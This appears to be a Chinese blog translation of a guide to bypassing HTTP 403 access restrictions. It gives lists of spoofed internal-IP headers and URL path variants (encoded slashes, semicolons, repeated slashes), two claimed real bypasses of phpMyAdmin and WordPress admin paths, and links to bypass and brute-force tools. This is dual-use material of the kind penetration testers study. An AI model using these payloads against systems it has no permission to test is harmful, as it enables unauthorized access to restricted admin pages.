译-绕过 403

发表于 |

403-forbidden 一般是服务器配置不允许访问该目录或文件

一些技巧

HTTP 标头模糊测试

在某些情况下,可以通过更改请求的 Header 并包含内部地址来访问页面和私有文件,以下是一些示例;

1
2
3
4
5
6
7
8
X-ProxyUser-Ip: 127.0.0.1
Client-IP: 127.0.0.1
Host: localhost
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Real-IP: 127.0.0.1

路径模糊测试

尝试对 url 进行一些更改,使用特殊字符或包括 HTML 编码,例如:

1
2
3
4
5
6
7
8
9
10
11
test.com/admin/*
test.com/*admin/
test.com/%2fadmin/
test.com%2fadmin%2f
test.com/./admin/
test.com//admin/./
test.com///admin///
test.com//admin//
test.com/ADMIN/
test.com/;/admin/
test.com//;//admin/

绕过真实示例 1

下面是phpmyadmin 的绕过,限制了特定ip对/phpmyadmin/ 的访问,下面都不行

1
2
3
4
/phpmyadmin/*
/./phpmyadmin/
//phpmyadmin//
/*/phpmyadmin/

下面3个斜杠就行

1
///phpmyadmin///

绕过真实示例 2

这是使用 2 个斜杠访问wordpress的登录后台

工具

有人已经开发了攻击,帮助识别并绕过403

https://github.com/iamj0ker/bypass-403

Burpsuite Professional的插件

https://portswigger.net/bappstore/444407b96d9c4de0adb7aed89e826122

查找具有 403 权限的可能目录,我们可以使用 Dirsearch 对目录和文件执行暴力破解。

https://github.com/maurosoria/dirsearch

原文

https://github.com/LucasPDiniz/403-Bypass

打赏专区
paypal: https://www.paypal.me/giantbranch
假如你看不到评论,可能是你访问Disqus被墙了,请使用代理访问